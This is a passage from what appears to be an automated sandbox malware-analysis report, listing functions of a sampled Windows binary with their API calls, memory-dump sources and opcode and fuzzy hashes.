                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBE01220B04B0942EB155BA159A527D22525FA97C1F04943BE40E82353CE3FA468C301
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE478BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1225938287-0
                                                                                                                                                                                                                              • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                                                                              • Instruction ID: 61c069371fb402ec80d971222c7e97ddf36f4192407578aaf12a91adf5832d82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F01D71929B8586D7609B14E45471E7760F7987E4F000326F6AD42BE8CF3DD1648B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE478C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1225938287-0
                                                                                                                                                                                                                              • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                                                                              • Instruction ID: a0529d1278290d316f47244e71e42da760edfa778b8d014c49171de44d492300
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFF01D71A29B8586D7609B14E44471EB760F7987E4F000326F6AD42BE8CF3DC1648B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE46B7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3418686817-3916222277
                                                                                                                                                                                                                              • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                                                                              • Instruction ID: bb161ff351682d43e0782668c5261e79f3b6bac45ab433f1f6b5fe817f8707f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6951B676619B8586DB54CB19E08036EB7A0F7D9B94F10512AFB8E87B68CF39D8508F40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE536500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                              • Opcode ID: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                                                                              • Instruction ID: a4a58c2e15564c90435671ef45e501baf23e1841e674b61a1244cfbeb18cbff3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6049e12829b25a40106f2a2772facc37ef588d00b3e3406152c56e8e443654b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA512B7291C6C586E720CF24D0543AD7BA0F754B88FA4413AF68D87A89CFBDD415CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE455D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsupr_s
                                                                                                                                                                                                                              • String ID: arg
                                                                                                                                                                                                                              • API String ID: 600324503-2022414218
                                                                                                                                                                                                                              • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                                                                              • Instruction ID: e803fe641d4430e642e3a944b09ba8ffc41ef55ea7e65e2c1fce980d4b538873
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031F03661864686D630DB29E45127E73A0FBD9798F604232FA8DC7BA9DF3DD9118F00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: try_get_function
                                                                                                                                                                                                                              • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                                                                              • API String ID: 2742660187-2031265017
                                                                                                                                                                                                                              • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                                                                              • Instruction ID: 97def60c199d36a2457952995c34e2ed0857e1d703865f351bfcb77dcdc77af8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADE04F52F08A0E91FE1447A1A8611F812219FBD3F0E484333F93C863E0DE6D99B58640
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5369D8 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE5363F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6DE536714,?,?,?,?,00000000,COMSPEC,?,00007FF6DE5369AE), ref: 00007FF6DE53641A
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF6DE5367C7,?,?,?,?,00000000,COMSPEC,?,00007FF6DE5369AE), ref: 00007FF6DE536A43
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF6DE5367C7,?,?,?,?,00000000,COMSPEC,?,00007FF6DE5369AE), ref: 00007FF6DE536A8F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                                              • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                                                                              • Instruction ID: 9acc68c2404aa8d95420008ce0439de605ee8b3e162dda8faec2c39ee9ba1b7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B881E862A0C68E85F765CF25947017D7AA1EB647C0F94403BE78EC7291DEBEF5618700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51B120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                                                                              • Instruction ID: 6681fabd8e2f3b1863d3b87761a520a7d35ba0ebeded1f31978a7948e0381380
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C651E921B0865AC5FEA49EA6942067E7651BF64BE8F044332FD7C877D5CE3EE4318601
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52D5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6DE52D50B,?,?,00000000,00007FF6DE52D5B3,?,?,?,?,?,?,00007FF6DE51AF6A), ref: 00007FF6DE52D63E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DE52D50B,?,?,00000000,00007FF6DE52D5B3,?,?,?,?,?,?,00007FF6DE51AF6A), ref: 00007FF6DE52D648
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1687624791-0
                                                                                                                                                                                                                              • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                                                                              • Instruction ID: 35c8d72efe56f5e4256c1e9db58f700298fd62e1963510522f045565fa56fc64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12118411F0A68B81EEA5577495B427D12925FB57E4F14423BF92EC72C2DE6EB8648300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4FD400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3548387204-0
                                                                                                                                                                                                                              • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                                                                              • Instruction ID: ccf5f6f17499cfd2db549644fe98ca980c5c9db205c13ac97f85c7b3c16f39c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0117654E0810B42FB28BBF14866BBC12814FB1B80F840832F55ED62C3ED1DB8758323
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4DF080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                                                                              • Instruction ID: 1f748709bba70feaa5ae6da42e1f668cb4fa8e3ba370195c4ae3562ee7a49a1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1011AC36908A4A86D7318B15E45432D73B0FBE87A8F504236E69E836E4DF3DD965CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE462DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                                                                              • Instruction ID: 27e5acaaac6991257d58b0c2a88e2890dc700c30f74a79e7bd211005e5a8490e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C71D836618B8586DB60CB1AE49036EB7A0F7C8B94F104126EA9DC7BA9DF3DD455CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE46CAF0 Relevance: 1.7, APIs: 1, Instructions: 217stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
